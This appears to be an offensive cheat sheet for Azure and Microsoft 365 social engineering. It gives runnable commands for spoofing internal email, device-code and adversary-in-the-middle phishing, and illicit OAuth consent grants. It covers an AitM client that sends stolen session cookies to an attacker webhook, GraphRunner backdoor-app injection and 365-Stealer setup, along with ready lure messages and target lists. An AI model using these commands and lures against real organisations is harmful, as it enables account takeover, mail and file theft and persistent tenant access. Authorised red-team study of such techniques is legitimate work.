Azure - Social Engineering

Email Spoofing

FindIngressEmail.ps1 - Test SPAM Filters using Direct Send Endpoint or External Mail Service

iwr https://raw.githubusercontent.com/rvrsh3ll/FindIngressEmail/main/FindIngressEmail.ps1 -Outfile FindIngressEmail.ps1
ipmo .\FindIngressEmail.ps1

# Need an HTML Template
iwr https://raw.githubusercontent.com/MelloSec/PhirstPhish/main/Templates/sharepoint.htm -Outfile sharepoint.html

# Create a List of Spoofed Emails
code fromEmails.txt

# Spoof internal address using Direct Send
$domain = ""
$target = ""
Invoke-FindIngressEmail -SMTPServer "$domain.mail.protection.outlook.com" -Subject "A Confidential Document has been shared with you." -BodyFile ./sharepoint.html -FromFile ./fromEmails.txt -Delay 5 -RetryDelay 35 -Verbose -ToEmail $target

# Spoof Using Mailgun
$domain = ""
$target = ""
$SMTPDomain = ""
Invoke-FindIngressEmail -SMTPServer smtp.mailgun.org -Subject "A Confidential Document has been shared with you." -BodyFile ./sharepoint.html -FromFile ./fromEmails.txt -EmailSmtpUser "postmaster@$SMTPDomain" -EmailSmtpPass "SMTPPass" -Delay 5 -RetryDelay 35 -Verbose -ToEmail "$target@$domain"

Device Code Phishing

Tools:

• https://github.com/Gerenios/AADInternals
• https://github.com/rvrsh3ll/TokenTactics
• https://github.com/mellosec/PhirstPhish
• https://github.com/rvrsh3ll/Azure-App-Tools
• https://blog.compass-security.com/2023/10/device-code-phishing-compass-tooling/
• https://github.com/secureworks/squarephish?tab=readme-ov-file
• https://github.com/CompassSecurity/TokenPhisher
• https://github.com/secureworks/PhishInSuits

Adding MFA App:

• https://blog.compass-security.com/2024/01/device-code-phishing-add-your-own-sign-in-methods-on-entra-id/

PhirstPhish - Account Take-Over, Internal Phish, OAuth Persistence, Pillage Outlook/Teams

Recon - AzureHound, AzureAD Module, AADInternals Recon Modules

git clone https://github.com/mellosec/PhirstPhish
cd PhirstPhish 

$targetUser = "accountant@corpomax.com"
$firstUser = "payroll@corpomax.com"
$messageContent = "Hey guys, <p> do you have any idea what this is? We need to pay it really soon, but we're having trouble accounting for it: https://collections.azurewebsites.net/invoice </p>  <p> Sincerely Yours.</p>"
$subject = "Invoice #3389 for Professional Services "
$template = "sharepoint"

.\wrapper.ps1 -targetUser $targetUser -firstUser $firstUser -messageContent $messageContent -subject $subject -template $template -azurehound -recon -azuread -install

Graph Modules - Run Invoke-GraphRunner for Recon and Inject a new Enterprise Application as User for Persistence / Consent Grant Phishing

git clone https://github.com/mellosec/PhirstPhish
cd PhirstPhish 

$targetUser = "accountant@corpomax.com"
$firstUser = "payroll@corpomax.com"
$messageContent = "Hey guys, <p> do you have any idea what this is? We need to pay it really soon, but we're having trouble accounting for it: https://collections.azurewebsites.net/invoice </p>  <p> Sincerely Yours.</p>"
$subject = "Invoice #3389 for Professional Services "
$template = "sharepoint"

.\wrapper.ps1 -targetUser $targetUser -firstUser $firstUser -messageContent $messageContent -subject $subject -template $template -GraphRecon -persistence

Phishing Only - Bypass Modules

$targetUser = "admin@corpomax.com"
$firstUser = "newemployee@corpomax.com"
$messageContent = "Hey guys, <p> the client is asking us to install an addin, something to do with the 'period net' framework and PDFs, sounds gross, haha. Can you take a look and see if we can get it installed? Thy're really breathing down our necks https://pdfutil.azurewebsites.net/addin </p> <p> Thanks guys you're the unsung heroes of CorpoMax, they should pay you more! </p> <p> Sincerely Yours.</p>"
$subject = "Software for Project Management"
$template = "chatgpt"

.\wrapper.ps1 -targetUser $targetUser -firstUser $firstUser -messageContent $messageContent -subject $subject -template $template

Link Phishing Only - Replace Device Code with a URL

$targetUser = "admin@corpomax.com"
$firstUser = "newemployee@corpomax.com"
$messageContent = "Hey guys, <p> the client is asking us to install an addin, something to do with the 'period net' framework and PDFs, sounds gross, haha. Can you take a look and see if we can get it installed? Thy're really breathing down our necks https://pdfutil.azurewebsites.net/addin </p> <p> Thanks guys you're the unsung heroes of CorpoMax, they should pay you more! </p> <p> Sincerely Yours.</p>"
$subject = "Software for Project Management"
$subject = "Software for Project Management"
$template = "chatgpt"

.\wrapper.ps1 -targetUser $targetUser -firstUser $firstUser -messageContent $messageContent -subject $subject -template $template

AitM Phishing

Coldworker.ps1 - API CLient for AitM Solution

Use an Outlook access token and send as serverless Azure Function. Proxies requests for login.microsoft.com and sends ESTSAUTH/ESTSAUTHPERSISTENT cookies to a Teams Webhook we control.

Interactive - Get/set tokens, campaign code and send from Menu:

.\Coldworker.ps1

Script Send - Script with splatting:

# Define the parameters in a hashtable
$target = "rmattingly@anchorconst.com"
$params = @{
    Direct = $true
    campaignId = "86753"
    templateId = "officesecurity"
    templateData = "https://bigdawgarmada.net/verify"
    recipient = "$target"
    subject = "Urgent: Action Required for Your Account"
    accessToken = "$access"
    baseUrl = "https://clickme.azurewebsites.net"
}

# Pass the hashtable using splatting
.\Coldworker.ps1 @params

Campaign - Script Send to a target list with X minutes $delay:

# Define the parameters in a hashtable
$target = ".\emails.txt"
$delay = "3"
$params = @{
    DirectCampaign = $true
    campaignId = "86753"
    templateId = "officesecurity"
    templateData = "https://bigdawgarmada.net/verify"
    emailListPath = "$target"
    maxDelayMinutes = "$delay"
    subject = "Urgent: Action Required for Your Account"
    accessToken = "$access"
    baseUrl = "https://clickme.azurewebsites.net"
}

# Pass the hashtable using splatting
.\Coldworker.ps1 @params

Illicit Consent Grant / OAuth App Phishing

If you can register an OAuth application or update credentials on an exisiting Application, you can use that Application to phish for access tokens at the least or delegated permissions if the tenant is configured to allow users to consent to apps. The default now is “For Verified Publishers” but there are settings for all, including allowing any user to grant admin consent. These apps can be consented to on behalf of the tenant in certain conditions as well.

Starting in November 2020, end-users will no longer be able to grant consent to most newly registered multi-tenant apps without verified publishers if risk-based step-up consent is enabled. This will apply to apps that are registered after November 8th 2020, use OAuth2.0 to request permissions beyond basic sign-in and read user profile, and request consent from users in different tenants than the one the app is registered in. A warning will be displayed on the consent screen informing users that these apps are risky and are from unverified publishers.

In an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.

One of the best Article on the subject, one of the very few to underline the limitation that implemented by Microsoft: -https://www.riskinsight-wavestone.com/en/2023/03/illicit-consent-grant-attacks-targeting-azure-and-office-365-still-a-threat/

Tools:

• https://github.com/AlteredSecurity/365-Stealer.git
• https://github.com/mdsecactivebreach/o365-attack-toolkit
• https://www.alteredsecurity.com/post/introduction-to-365-stealer
• https://www.youtube.com/watch?v=51FSvndgddk&list=WL
• https://positivethinking.tech/insights/what-is-an-illicit-consent-grant-attack-in-office-365/
• https://www.proofpoint.com/us/blog/threat-insight/ta2552-uses-oauth-access-token-phishing-exploit-read-only-risks
• https://www.mdsec.co.uk/2019/07/introducing-the-office-365-attack-toolkit/
• https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/
• https://redblueteam.wordpress.com/2021/04/12/microsoft-office-365-oauth-phishing-demo/

Resources:

• https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide
• https://blog.thoughtstuff.co.uk/2020/11/end-users-can-no-longer-grant-consent-to-unverified-multi-tenant-apps-what-this-means-for-you/?fbclid=IwAR3PAwBKWFGcW04Vfq6NOMta7tMG0a4F-9T_AAl8nrnqdiZUgsjgbmpzBWw
• https://docs.microsoft.com/en-us/azure/active-directory/develop/publisher-verification-overview#benefits
• https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-user-consent?tabs=azure-portal#risk-based-step-up-consent
• https://stackoverflow.com/questions/66387268/microsoft-multi-tenant-app-as-an-individual-developer-azure-active-directory

Configure Application

Create Client Secrets

1. Click on Certificates & secrets
2. Click on New client secret then enter the Description and click on Add.
3. Save the secret’s value somewhere in a safe place.

Add API Permissions

1. Click on API permissions
2. Click Add a permission
3. Click on Microsoft Graph
4. Click on Delegated permissions
5. Search and select the below mentioned permissions and click on Add permission (This depends upon what permissions we want from the victim)
   1. Contacts.Read
   2. Mail.Read
   3. Notes.Read.All
   4. Mailboxsettings.ReadWrite
   5. Files.ReadWrite.All
   6. Mail.Send
   7. User.ReadBasic.All

AzureADPreview - Check if users can consent, doesn’t always work, just need to try yourself but worth a shot

Import-Module AzureADPreview
$passwd = ConvertTo-SecureString "V3ryH4rdt0Cr4ckN0OneC@nGu355ForT3stUs3r" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("test@defcorphq.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds
(Get-AzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole

GraphRunner - Inject OAuth App - For Persistence and consent grant phishing. Swap “op backdoor” with “low” as needed

$AppName = Read-Host "AppName"
$ReplyUrl = Read-Host "ReplyUrl"
$low = "openid profile offline_access email User.Read User.ReadBasic.All Mail.Read"
$Scope = "op backdoor"
Invoke-InjectOAuthApp -AppName $AppName -ReplyUrl $ReplyUrl -scope $Scope -Tokens $tokens *> .\PersistenceApp.json 

GraphRunner - Consent to Application - Using output from previous command, consent to app and complete authentication flow

$low = "openid profile offline_access email User.Read User.ReadBasic.All Mail.Read"
$opbackdoor = "op backdoor"
$Scope = "$opbackdoor"
$ClientId = Read-Host "ClientId"
$ClientSecret = Read-Host "ClientSecret"
$RedirectUri = $ReplyUrl
Invoke-AutoOAuthFlow -ClientId $ClientID -ClientSecret "$ClientSecret" -RedirectUri $RedirectUri -scope $Scope

365-Stealer - Setup

1. Clone 365-Stealer from https://github.com/AlteredSecurity/365-Stealer

git clone https://github.com/AlteredSecurity/365-Stealer.git

2. Save the extracted in C:\xampp\htdocs\ or at any location that can help us to host the PHP application and run Python.
3. Install the required application

Python3 PHP CLI or Xampp server

4. Install the required python modules

pip install -r requirements.txt

Enable sqlite3 in apache server

1. Open Xampp server, click on config of Apache and select PHP (php.ini)
2. Search for extension=sqlite3 and remove ; from the begining as it is considered as a comment and then save the file.(File location: C:\xampp\php\php.ini)
3. Start the Apache server.

Note: 365-Stealer will by default run on Port 443 (that can be changed by using --port flag) so we need to run apache server on another Port. This can be done by changing Port in Xampp server to avoid conflict between our 365-Stealer Phishing application & Management portal. We can also use PHP CLI command from the “./yourVictims/” directory as mentioned below.

Enable IP whitelisting for 365-Stealer Management portal

By default whitelisting is enabled and the portal can only be accessed from localhost. We can add a Remote IP or disable whitelisting ( $enableIpWhiteList = false; )

365-Stealer

git clone https://github.com/AlteredSecurity/365-Stealer.git
cd 365-Stealer
pip install -r requirements.txt
sudo apt install php-cli -y
choco inst -y xampp-80
cd ..
cp -r -force .\365-Stealer C:\xampp\htdocs 

# create your app, assign permissions, create your client ID and secrets
python3 ./365-Stealer.py --set-config

# Run app
python3 ./365-Stealer.py --run-app

# Ubuntu installer for Dashboard on linux
# https://sourceforge.net/projects/xampp/files/XAMPP%20Linux/8.2.0/xampp-linux-x64-8.2.0-0-installer.run/download